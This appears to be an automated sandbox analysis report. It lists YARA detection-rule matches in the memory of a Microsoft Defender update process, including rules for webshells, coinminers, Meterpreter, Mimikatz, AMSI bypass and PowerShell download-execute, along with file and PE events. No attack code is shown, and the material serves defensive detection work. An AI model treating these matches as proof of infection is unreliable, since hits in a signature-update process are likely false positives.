Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6324954542.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6347606531.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000024.00000003.6339257691.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6339257691.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6407260909.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6407260909.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6277539520.00000197A4590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000024.00000003.6277539520.00000197A4590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6277539520.00000197A4590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6277539520.00000197A4590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6315364038.00000197A2FD4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6407733822.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6407733822.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_known_webshell date = 2021/01/09, author = Arnim Rupp, description = Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7b6471774d14510cf6fa312a496eed72b614f6fc
Source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6328572357.00000197A4180000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CVE_2018_4878_0day_ITW Description = This signature is mostly public sourced and detects an in-the-wild exploit for CVE-2018-4878., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000024.00000003.6334441396.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_generic date = 2021/01/14, author = Arnim Rupp, description = php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = bee1b76b1455105d4bfe2f45191071cf05e83a309ae9defcf759248ca9bceddd
Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_generic_eval date = 2021/01/07, author = Arnim Rupp, description = Generic PHP webshell which uses any eval/exec function in the same line with user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 90c5cc724ec9cf838e4229e5e08955eec4d7bf95
Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: ChinaChopper_Generic date = 2015/03/10, author = Florian Roth, description = China Chopper Webshells - PHP and ASPX, reference = https://www.fireeye.com/content/dam/legacy/resources/pdfs/fireeye-china-chopper-report.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6278908021.00000197A4866000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6316787263.00000197A40EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000024.00000003.6287839327.00000197A4D21000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000024.00000003.6273910781.00000197A3D92000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6273910781.00000197A3D92000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6342326827.00000197A41F5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6434024184.00000197A433E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoldDragon_Aux_File date = 2018-02-03, author = Florian Roth, description = Detects export from Gold Dragon - February 2018, reference = https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6434024184.00000197A433E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6304991595.00000197A4237000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 00000024.00000003.6304991595.00000197A4237000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: 00000024.00000003.6301296808.00000197A4FB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6301296808.00000197A4FB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6406830616.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6406830616.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6436059336.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6436059336.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6432826435.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000024.00000003.6432826435.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6289913928.00000197A39B3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6288930033.00000197A47A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000024.00000003.6308756420.00000197A3F60000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6338624600.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6338624600.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6352553916.00000197A34AB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: Keylogger_CN_APT date = 2016-03-07, author = Florian Roth, description = Keylogger - generic rule for a Chinese variant, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 3efb3b5be39489f19d83af869f11a8ef8e9a09c3c7c0ad84da31fc45afcf06e7
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: PLUGX_RedLeaves date = 2017-04-03, author = US-CERT Code Analysis Team, MD5_5 = 566291B277534B63EAFC938CDAAB8A399E41AF7D, description = Detects specific RedLeaves and PlugX binaries, MD5_1 = 598FF82EA4FB52717ACAFB227C83D474, MD5_2 = 7D10708A518B26CC8C3CBFBAA224E032, MD5_3 = AF406D35C77B1E0DF17F839E36BCE630, MD5_4 = 6EB9E889B091A5647F6095DCD4DE7C83, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, incident = 10118538
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: WindowsCredentialEditor threat_level = , description = Windows Credential Editor
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe

File deleted: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\1.1.18500.10_to_1.1.18600.4_mpengine.dll._p

Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe

File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4

Jump to behavior

Source: MpAsDesc.dll.mui18.45.dr

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: MpAsDesc.dll.mui2.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui5.45.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui18.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui34.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui24.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui11.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui21.45.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui8.45.dr	Static PE information: No import functions for PE file found
